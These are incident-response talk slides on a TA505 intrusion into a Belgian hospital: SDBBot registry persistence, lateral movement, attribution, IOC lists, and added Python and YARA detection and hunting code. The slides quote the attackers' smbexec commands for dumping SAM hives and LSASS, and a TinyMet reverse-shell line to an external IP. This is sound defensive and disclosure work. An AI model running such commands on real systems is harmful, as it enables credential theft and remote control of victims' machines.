Another threat actor day
CERT-XLM - Computer Security Incident Response Team
Virus Bulletin 2020
TLP:WHITE
Agenda
• Who we are
• The case
• Incident response
• Hunting for SDBBOTs
Who am I / Who are we?
• Paul Jung
  • CSIRT team leader
  • 20+ years in the infosec field
  • Occasional speaker at infosec conferences
  • Twitter: @__Thanat0s__
• Excellium Services CSIRT
  • CERT-XLM
  • Incident response
  • Luxembourg, Belgium, Senegal, Ivory Coast
The case
Breach analysis
• Context
  • December 2019
  • Belgian hospital
• Symptoms
Delivery
• Massive e-mail phishing campaign
  • 08/11/2019: first phishing campaign
  • 13/11/2019: second phishing campaign, delivered to 120 mailboxes
• From "marketing <[email protected]>" ([email protected])
• Originated from a Russian university
Delivery
• No document attached
• Link to hxxp://merky.de/30rsjy
• URL shortener redirecting to hxxps://dl2.box-cnd.com/?&qzjou=ISUsa3
Exploitation
• The link serves a macro-enabled document
• Executed by a user back from holidays, 15 days after the phishing
• The document embeds two binaries: 32- and 64-bit PE DLL droppers (GET2)
[Diagram: dl2.box-cnd.com -> workstation]
Exploitation
• GET2 reports to microsoft-hub-us.com
  • Hostname
  • Username
  • Version
  • Running processes
• Receives and loads another payload
[Diagram: dl2.box-cnd.com -> workstation]
Command & Control
• SDBBOT is fileless malware
  • Simple persistence
  • Stored in the registry
  • Random name/location
  • PE kept out of the file system, lowering AV detection
  • A different loader for each infected workstation
[Diagram: Run key in the current-user hive -> stage 1: xrbvajc.dll stored on disk -> stage 2: JVC registry key with an embedded PE -> the backdoor hidden in stage 2 is executed]
Command & Control
• SDBBOT stealth persistence: the launcher
[Diagram: same three-stage chain as above; labels "Launcher" and "UID"]
Run value in the current-user hive:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  [random].dll = rundll32 "c:\Users\[redacted]\AppData\Roaming\[random].dll" #1
Command & Control
• SDBBOT stealth persistence: the registry payload
[Diagram: same three-stage chain; labels "Launcher" and "UID"; the stage-2 value carries the decoy string "Copyright (C) Microsoft Corporation"]
Stage 2 location: HKEY_CURRENT_USER\Software\Microsoft\[RANDOM 3]\[RANDOM 1]
Command & Control
• SDBBOT stealth persistence: layout of the registry blob
[Diagram: the value under HKEY_CURRENT_USER\Software\Microsoft\[RANDOM 3]\[RANDOM 1] holds a Launcher, Shellcode, a CompressedPE (the backdoor) and a Decoy]
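The two persistence artefacts on the preceding slides (a Run value that calls rundll32 on a DLL under AppData\Roaming by export ordinal #1, and a large REG_BINARY value under HKCU\Software\Microsoft carrying an embedded PE) can be checked mechanically on a suspect host. What follows is an added example written for this page, not tooling from the talk or from CERT-XLM. It matches the Run-value shape, walks binary registry values for an MZ header whose e_lfanew points at a PE signature, and flags the Microsoft copyright decoy. The live registry walk uses winreg and only runs on Windows; the depth of the scan (one key below HKCU\Software\Microsoft) is an assumption read off the slide's [RANDOM 3]\[RANDOM 1] path, and the sample blob and Run value are constructed for the demonstration.

```python
import re
import struct
import sys

# Stage-1 launcher shape from the Run-key slide:
#   rundll32 "<profile>\AppData\Roaming\<random>.dll" #1
# Straight and curly quotes are both accepted (slide exports mangle them).
QUOTE = "\"'\u2018\u2019"
RUN_LAUNCHER_RE = re.compile(
    r"^\s*(?:\"?[^\"\s]*\\)?rundll32(?:\.exe)?\s+[" + QUOTE + r"]+"
    r"(?P<dll>[^" + QUOTE + r"]+\\AppData\\Roaming\\[^" + QUOTE + r"\\]+\.dll)"
    r"[" + QUOTE + r"]+\s+#(?P<ordinal>\d+)\s*$",
    re.IGNORECASE,
)
DECOY = b"Copyright (C) Microsoft Corporation"  # decoy string shown on the stage-2 slide

def suspicious_run_value(command: str):
    """(dll_path, export_ordinal) if a Run value has the SDBBot launcher shape, else None."""
    m = RUN_LAUNCHER_RE.match(command)
    return (m.group("dll"), int(m.group("ordinal"))) if m else None

def find_embedded_pe(blob: bytes, min_size: int = 4096):
    """Offsets of PE images inside a binary registry value: an 'MZ' whose e_lfanew
    (dword at +0x3C) points at a 'PE\\0\\0' signature. Values under min_size are skipped."""
    hits = []
    if len(blob) < min_size:
        return hits
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            sig = pos + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and blob[sig:sig + 4] == b"PE\x00\x00":
                hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits

def has_decoy(blob: bytes) -> bool:
    """The Microsoft copyright decoy as ASCII or UTF-16LE: a supporting hint, not proof by itself."""
    return DECOY in blob or DECOY.decode().encode("utf-16-le") in blob

def triage(run_values: dict, binary_values: dict):
    """run_values: {value_name: command}; binary_values: {key\\value: bytes}.
    Returns (finding, location, details) tuples."""
    findings = []
    for name, cmd in run_values.items():
        hit = suspicious_run_value(cmd)
        if hit:
            findings.append(("run_value_rundll32_ordinal", name, {"dll": hit[0], "ordinal": hit[1]}))
    for path, blob in binary_values.items():
        offsets = find_embedded_pe(blob)
        if offsets:
            findings.append(("registry_value_embedded_pe", path,
                             {"pe_offset": offsets[0], "size": len(blob), "decoy": has_decoy(blob)}))
    return findings

def collect_hkcu():
    """Windows only: Run values plus REG_BINARY values one key below HKCU\\Software\\Microsoft
    (that depth is an assumption read off the slide's [RANDOM 3]\\[RANDOM 1] path)."""
    import winreg
    run_values, binary_values = {}, {}

    def values_of(key):
        i = 0
        while True:
            try:
                yield winreg.EnumValue(key, i)
            except OSError:
                return
            i += 1

    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run") as k:
        for name, data, _ in values_of(k):
            run_values[name] = str(data)
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft") as root:
        for j in range(winreg.QueryInfoKey(root)[0]):
            sub = winreg.EnumKey(root, j)
            try:
                with winreg.OpenKey(root, sub) as k:
                    for name, data, typ in values_of(k):
                        if typ == winreg.REG_BINARY:
                            binary_values[f"HKCU\\Software\\Microsoft\\{sub}\\{name}"] = data
            except OSError:
                continue
    return run_values, binary_values

def sample_pe_blob(size: int = 8192) -> bytes:
    """Constructed stand-in for a stage-2 value: MZ stub, e_lfanew -> 'PE\\0\\0', decoy, zero padding."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    body = bytes(hdr) + b"PE\x00\x00" + DECOY
    return body + b"\x00" * (size - len(body))

if __name__ == "__main__":
    if sys.platform == "win32":
        runs, bins = collect_hkcu()
    else:  # offline demonstration on constructed data
        runs = {"xrbvajc": r'rundll32 "c:\Users\alice\AppData\Roaming\xrbvajc.dll" #1'}
        bins = {r"HKCU\Software\Microsoft\JVC\abc": sample_pe_blob()}
    for finding in triage(runs, bins):
        print(*finding)
```

Because the stage-2 blob is compressed on the slide, the MZ scan is meant for the launcher and decoy portions of the value; a value that is large, binary, sits under a random key name and trips either check is worth pulling for analysis even when no clean PE header is found.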
Command & Control
• SDBBOT capabilities
  • C&C to drm-server-booking.com
  • Reports the external IP (fetched from ip-api.com)
  • Downloads files
  • Performs file operations
  • Executes commands
  • Streams the screen content
  • Forwards network connections
  • Reboots the host
[Diagram: workstation -> drm-server-booking.com]
Action on objectives
• MS17-010 used for lateral movement and privilege escalation
  • First pivot onto a domain controller
  • Evidence shows domain administrator privileges gained 1h20 after the first connection
  • Persistence set up with a user "support" placed in the domain administrators group
[Diagram: patient 0 -> domain controller]
Action on objectives
• Attackers used Meterpreter for offensive actions
  • A repackaged Meterpreter stager named TinyMet, stored locally as wsus.exe
  • Spread using smbexec
  • Connections to the 91.214.124.0/24 subnet: AS210119, IPs geolocated in the Seychelles, AS originally registered in Ukraine
[Diagram: workstations -> 91.214.124.5]
Action on objectives
• Extraction of the domain database ~20h after access to the DC
  • Retrieval of the SAM database
  • Dump of the LSASS process
  • Execution of pwdump tools
Commands executed through smbexec:
%COMSPEC% /Q /c echo reg.exe save hklm\sam C:\Intel\sam ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
%COMSPEC% /Q /c echo reg.exe save hklm\security C:\Intel\security ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
%COMSPEC% /Q /c echo reg.exe save hklm\system C:\Intel\system ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
%COMSPEC% /Q /c echo C:\Intel\procdump.exe -accepteula -ma lsass.exe lsass.dmp ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
%COMSPEC% /Q /c echo C:\Intel\pwdump.exe > C:\Intel\pw ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
Action on objectives
• Deployment for persistence
  • More than 50 servers/workstations compromised
  • Deployed at SYSTEM level
  • Using Meterpreter with admin credentials
  • Using smbexec, which leaves a service behind
Attribution
%COMSPEC% /Q /c echo ping google.ca ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
Attribution
Source: http://www.ottawalife.com
Attribution
[Diagram: Metasploit C&C -> TA505]
Attribution
• Attribution sources
  • TLP:AMBER
    • Collected artefacts
    • ANSSI report, 11/2019: "Informations concernant le rançongiciel CLOP" (information on the CLOP ransomware)
  • TLP:WHITE
    • ASEC, Q3 2019: Report vol. 96
    • Proofpoint, 10/2019: "TA505 Distributes New SDBbot Remote Access Trojan with GET2 Downloader"
    • ATT&CK: all reports registered for the group
• Attribution to TA505 / G0092
TA505 is a financially motivated threat group that has been active since at least 2014. The group is known for frequently changing malware and driving global trends in criminal malware distribution. It uses phishing or malware for the initial breach.
Attribution
• ASEC paper (October 2019)
  • Same backdoor: SDBBot
  • Same loader name: wsus.exe
https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf
Incident response
Incident response
[Timeline: 1 week + 3 days, spanning two weekends]
• Big environment
  • No IR preparation
  • Flat network
  • A hospital means heterogeneity
Incident response
• Easy to spot
  • Artefacts created by smbexec
    • BTOBTO services
    • C:\__output
  • Listening Meterpreter
    • Port 8080 listening
  • Evtx
  • Remote folder scans
  • Nmap
Metasploit artefact:
%COMSPEC% /C echo C:\Windows\wsus.exe 0 91.214.124.15 443 ^> %SYSTEMDRIVE%\WINDOWS\Temp\iaetRnAqpruNtWFZ.txt > \WINDOWS\Temp\wmCiqaHkZzuHNNMT.bat &
Incident response
TinyMet: https://github.com/SherifEldeeb/TinyMet
The same Metasploit artefact, read as TinyMet arguments (wsus.exe <transport> <IP> <port>):
%COMSPEC% /C echo C:\Windows\wsus.exe 0 91.214.124.15 443 ^> %SYSTEMDRIVE%\WINDOWS\Temp\iaetRnAqpruNtWFZ.txt > \WINDOWS\Temp\wmCiqaHkZzuHNNMT.bat &
Transport codes:
  0: reverse_tcp
  1: reverse_http
  2: reverse_https
  3: bind_tcp
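The smbexec wrapper on the credential-dumping slide and the Metasploit wrapper around wsus.exe above have a fixed shape that survives in process-creation (4688) and service-install (7045) telemetry, so the operator's real command can be recovered from the noise. The following is an added example for this page, not tooling from the talk: it unwraps both wrapper forms and decodes a TinyMet invocation using the transport table above. The Finding class, the regexes and the sample command lines are constructed for the demonstration; the sample lines reuse the commands printed on the slides plus one benign line.

```python
import re
from dataclasses import dataclass
from typing import Optional

# TinyMet transport codes, as listed on the slide above
TINYMET_TRANSPORTS = {0: "reverse_tcp", 1: "reverse_http", 2: "reverse_https", 3: "bind_tcp"}

# impacket smbexec wrapper; the same string is the ImagePath of the BTOBTO service it
# installs, so it shows up in event 7045 as well as in 4688:
#   %COMSPEC% /Q /c echo <cmd> ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & ...
SMBEXEC_RE = re.compile(
    r"%COMSPEC%\s+/Q\s+/c\s+echo\s+(?P<inner>.+?)\s+\^>\s+\\\\127\.0\.0\.1\\C\$\\__output"
    r"\s+2\^>\^&1\s*>\s*%TEMP%\\execute\.bat",
    re.IGNORECASE,
)
# Metasploit psexec-style wrapper seen on the "easy to spot" slide:
#   %COMSPEC% /C echo <cmd> ^> %SYSTEMDRIVE%\WINDOWS\Temp\<rnd>.txt > \WINDOWS\Temp\<rnd>.bat &
MSF_RE = re.compile(
    r"%COMSPEC%\s+/C\s+echo\s+(?P<inner>.+?)\s+\^>\s+%SYSTEMDRIVE%\\WINDOWS\\Temp\\\w+\.txt"
    r"\s*>\s*\\WINDOWS\\Temp\\\w+\.bat",
    re.IGNORECASE,
)
# TinyMet command line: <stager.exe> <transport 0-3> <ip> <port>
TINYMET_RE = re.compile(
    r"(?P<exe>\S+\.exe)\s+(?P<transport>[0-3])\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})\b",
    re.IGNORECASE,
)

@dataclass
class Finding:
    wrapper: str             # "smbexec" or "metasploit"
    inner: str               # the command the operator actually ran
    tinymet: Optional[dict]  # decoded stager arguments when the inner command is TinyMet

def decode_tinymet(cmd: str) -> Optional[dict]:
    """Map 'wsus.exe 0 91.214.124.15 443' to its transport, C&C address and port."""
    m = TINYMET_RE.search(cmd)
    if not m:
        return None
    return {"exe": m.group("exe"), "transport": TINYMET_TRANSPORTS[int(m.group("transport"))],
            "ip": m.group("ip"), "port": int(m.group("port"))}

def unwrap(cmdline: str) -> Optional[Finding]:
    """Strip the smbexec / Metasploit echo-to-batch wrapper and return what was really executed."""
    for name, rx in (("smbexec", SMBEXEC_RE), ("metasploit", MSF_RE)):
        m = rx.search(cmdline)
        if m:
            inner = m.group("inner").strip()
            return Finding(name, inner, decode_tinymet(inner))
    return None

def scan(cmdlines):
    """Run unwrap() over a batch of command lines and keep the hits."""
    return [f for f in map(unwrap, cmdlines) if f is not None]

# Constructed telemetry: three command lines from the slides plus a benign one.
SAMPLE_CMDLINES = [
    r"%COMSPEC% /Q /c echo reg.exe save hklm\sam C:\Intel\sam ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat",
    r"%COMSPEC% /Q /c echo C:\Intel\procdump.exe -accepteula -ma lsass.exe lsass.dmp ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat",
    r"%COMSPEC% /C echo C:\Windows\wsus.exe 0 91.214.124.15 443 ^> %SYSTEMDRIVE%\WINDOWS\Temp\iaetRnAqpruNtWFZ.txt > \WINDOWS\Temp\wmCiqaHkZzuHNNMT.bat &",
    r"C:\Windows\System32\cmd.exe /c dir C:\Users",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f.wrapper, "|", f.inner, "|", f.tinymet)
```

The unwrapped inner command is what to alert on (reg.exe save hklm\sam, procdump against lsass, a stager with a transport code and an external address); the wrapper itself is a reliable smbexec / Metasploit signature regardless of what it carries, and the decoded IP and port feed straight into the sinkholing step described later in the deck.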
Incident response
[Diagram: patient 0, SDBBot C&C, Meterpreter C&C, servers, servers and workstations, TA505]
Incident response
Fears
• Still ~300 hosts vulnerable to MS17-010
• When will CLOP be launched?
• Does SDBBOT always use the same C&C?
Actions
• Internet access cut for servers
• Sinkholing of known bad IPs
• Detection of "meterpreted" hosts
How to detect SDBBOT?
• Unique hash per sample
• Located in the registry under a random name
Incident response
• Analysis of the compromised hosts: detection of the SDBBOT backdoors
  • File-based detection
  • Registry-based detection
Incident response
• SDBBOT weaknesses
  • Reports the external IP (fetched from ip-api.com)
  • Hardcoded User-Agent
[Diagram: workstation -> ip-api.com]
Incident response
• Analysis of the compromised hosts: detection of the SDBBOT backdoors
  • File-based detection
  • Registry-based detection
  • External IP fetching
Incident response
• SDBBOT weaknesses
  • Communication is binary
  • Uses port 443 but no SSL/TLS
  • The handshake is visible: "DEC0"
[Diagram: workstation <-> drm-server-booking.com, 4-byte handshake rendered 0000DECO in each direction]
Command & Control
• SDBBOT weaknesses
  • Configuration can be overridden
  • Ip.txt
[Diagram: C&C drm-server-booking.com overridden to Whereeveriwant.com]
Incident response
• In-memory detection on servers
  • Injected into winlogon.exe
  • No other backdoor discovered
  • No other C&C discovered
SDBBOT found on some servers
YARA rule used to pull the SDBBOT configuration out of memory:
rule sdbbot {
    meta:
        description = "Get SDBBOT conf"
    strings:
        $re0 = /Hosts=[a-zA-Z0-9\-.]{5,32}/
    condition:
        all of ($re*)
}
Incident response
• Analysis of the compromised hosts: solutions for detecting the SDBBOT backdoors
  • File-based detection
  • Registry-based detection
  • External IP fetching
  • Network detection
  • Configuration override
  • In-memory scan
Incident response
TA505 is fast
Hunting for SDBBOT
Hunting for SDBBOT
• Fileless malware
• Unique launcher
• Rare on public sandboxes
• Hard to spot samples in the wild
How to spot them?
Hunting for SDBBOT
• SDBBOT weaknesses
  • Uses port 443 but no SSL/TLS
  • The handshake is visible: "DEC0"
  • Need to send 4 bytes and analyse the response
[Diagram: sdbbot <-> drm-server-booking.com, 0000DECO in each direction]
Hunting for SDBBOT
• Hostname similarities between dropper and bot infrastructure
  • news-server-drm-google.com
  • drm-server13-login-microsoftonline.com
  • drm-server-booking.com
  • microsoft-hub-us.com
  • …
• Hostname pattern reuse
  • windows-msd-update.com
  • windows-fsd-update.com
  • windows-sys-update.com
  • windows-se-update.com
  • windows-en-us-update.com
  • update365-office-ens.com
  • update365-update-en-gb.com
  • office365-update-eu.com
Hunting for SDBBOT
• Label splitting
  • Labels: drm, server, microsoft, office, cloud
  • Generate: drm-server, server-drm, drm-server-cloud, server-drm-cloud, cloud-drm-server, …
  • Resolve
  • Autonomous System Number
  • NSE (Nmap scripting engine) probe
• Result: ~120 labels -> ~397 AS -> ~12 SDBBOT
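The pipeline on this slide, combined with the 4-byte handshake from the "Hunting for SDBBOT" weakness slide, as an added example written for this page rather than the talk's own NSE script: permute a short label list into candidate hostnames, resolve them, connect to TCP/443 without TLS, send the probe and classify the reply. The probe bytes are an assumption: the slides only show the handshake rendered as "0000DECO", which is read here as the bytes 00 00 DE C0 in each direction; set PROBE and EXPECTED from a packet capture of a real sample before relying on the verdict. The ASN lookup step from the slide is left out. Resolution and probing need network access; candidate generation and reply classification run offline.

```python
import itertools
import socket

# Assumption: the slides render the 4-byte handshake as "0000DECO" in both directions,
# read here as the bytes 00 00 DE C0 sent by the client and echoed by the server.
# Replace both with what a packet capture of a real sample shows.
PROBE = bytes.fromhex("0000dec0")
EXPECTED = bytes.fromhex("0000dec0")

def generate_candidates(labels, tld="com", min_parts=2, max_parts=3):
    """Every ordered hyphen-joined combination of 2..3 labels under one TLD, e.g. drm-server-cloud.com."""
    names = []
    for n in range(min_parts, max_parts + 1):
        for combo in itertools.permutations(labels, n):
            names.append("-".join(combo) + "." + tld)
    return names

def classify_reply(reply: bytes) -> str:
    """Sort a TCP/443 reply to the probe: the marker echoed back, a TLS record (a real HTTPS
    server answering our junk with an alert or handshake), nothing at all, or something else."""
    if not reply:
        return "silent"
    if reply[:4] == EXPECTED:
        return "sdbbot"
    if reply[0] in (0x15, 0x16):
        return "tls"
    return "other"

def probe(host: str, port: int = 443, timeout: float = 5.0) -> str:
    """Plain TCP, no TLS: send the 4-byte probe and classify whatever comes back."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            s.sendall(PROBE)
            try:
                reply = s.recv(64)
            except socket.timeout:
                reply = b""
    except OSError:
        return "unreachable"
    return classify_reply(reply)

def resolve(name: str):
    """IPv4 addresses a candidate name resolves to, or [] when it does not exist."""
    try:
        infos = socket.getaddrinfo(name, 443, socket.AF_INET, socket.SOCK_STREAM)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})

def hunt(labels, tld="com"):
    """Generate -> resolve -> probe; returns {(name, ip): verdict} for names that resolved."""
    verdicts = {}
    for name in generate_candidates(labels, tld):
        for ip in resolve(name):
            verdicts[(name, ip)] = probe(ip)
    return verdicts

if __name__ == "__main__":
    for (name, ip), verdict in hunt(["drm", "server", "microsoft", "office", "cloud"]).items():
        print(f"{name:40} {ip:16} {verdict}")
```

Five labels give 80 candidates at two and three parts; a "tls" verdict is the expected answer from a legitimate host and rules the address out quickly, while an "sdbbot" verdict is a lead to confirm against a captured session rather than attribution on its own.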
SDBBOT hosts strangeness
• SDBBot is invisible to shodan.io
• Operating systems
  • Ubuntu 18.04
  • Ubuntu 16.04
  • Debian 10
SDBBOT infrastructure
• Deployed everywhere
IOC
SDBBOT IPs
190.211.254.224
192.161.167.165
23.152.0.152
192.52.167.233
92.38.135.217
158.255.208.148
158.255.208.168
51.38.82.162
212.83.46.170
Tools used
TinyMet
smbexec
procdump
pwdump
Meterpreter
GET2
SDBBot
SDBBOT hostnames
eu-global.com
auxin-box.com
drm-google-analtyic.com
drm-server-booking.com
drm-server13-login-microsoftonline.com
eu-global-online.com
facebook-drm-server3.com
jp-microsoft-store.com
static-google-analtyic.com
news-server-drm-google.com
Domains alleged to TA505
att-download.com
auxin-box.com
box-cnd.com
box-en-au.com
cdn-box.com
cdn-downloads.com
cdn-onedrive-live.com
clients-share.com
clietns-download.com
clouds-cdn.com
clouds-doanload-cnd.com
clouds-share.com
cloud-store-cnd.com
dl-icloud.com
dl-sharefile.com
dl-sync.com
download-cdn.com
download-shares.com
drm-google-analtyic.com
drm-server13-login-microsoftonline.com
drm-server-booking.com
dyn-downloads.com
eu-global.com
eu-global-online.com
facebook-drm-server3.com
file-downloads.com
fileshare-cdns.com
fileshare-storage.com
general-lcfd.com
get-downloads.com
getlink-service.com
global-logic-stl.com
glr-ltd.com
googledrive-en.com
googledrive-eu.com
home-storages.com
int-download.com
integer-ms-home.com
into-box.com
i-sharecloud.com
jp-microsoft-store.com
live-cnd.com
live-en.com
live-msr.com
mainten-ferrum.com
microsoft-cnd.com
microsoft-cnd-en.com
microsoft-home-en.com
microsoft-hub-us.com
microsoft-live-us.com
microsoft-sback-server.com
microsoft-store-drm-server.com
microsoft-store-en.com
microsoft-ware.com
ms-break.com
ms-en-microsoft.com
ms-global-store.com
ms-home-store.com
msonebox.com
ms-rdt.com
ms-upgrades.com
office365-update-eu.com
onedrive-cdn.com
onedrive-download.com
onedrive-download-en.com
onedrive-live-en.com
onedrive-sdn.com
onedrives-en-live.com
one-drive-storage.com
onehub-en.com
owncloud-cnd.com
reselling-corp.com
selling-group.com
share-clouds.com
shared-cnd.com
shared-downloading.com
share-downloading.com
sharefile-cnd.com
sharefile-en.com
sharefiles-download.com
shares-cdns.com
shares-cloud.com
sharespoint-en.com
share-stores.com
shr-links.com
stat-downloads.com
static-downloads.com
static-google-analtyic.com
store-in-box.com
stt-box.com
studio-stlsdr.com
tnrff-home.com
update365-office-ens.com
windows-en-us-update.com
windows-fsd-update.com
windows-msd-update.com
windows-office365.com
windows-se-update.com
windows-sys-update.com
windows-wsus-en.com
windows-wsus-eu.com
wpad-home.com
xbox-en-cnd.com
TTP
ATT&CK references
• Spearphishing Link: https://attack.mitre.org/techniques/T1192/
• User Execution: https://attack.mitre.org/techniques/T1204/
• Application Shimming: https://attack.mitre.org/techniques/T1138/
• Registry Run Keys: https://attack.mitre.org/techniques/T1060/
• Rundll32: https://attack.mitre.org/techniques/T1085/
• Exploitation for Privilege Escalation: https://attack.mitre.org/techniques/T1068/
• Process Injection: https://attack.mitre.org/techniques/T1055/
• Credential Dumping: https://attack.mitre.org/techniques/T1003/
• Commonly Used Port: https://attack.mitre.org/techniques/T1043/
• Exfiltration Over C2 Channel: https://attack.mitre.org/techniques/T1041/
References
● https://github.com/SherifEldeeb/TinyMet
● https://malpedia.caad.fkie.fraunhofer.de/actor/ta505
● https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf
● https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader
● https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
● https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104
● Twitter: @AdamTheAnalyst
● Twitter: @stoerchl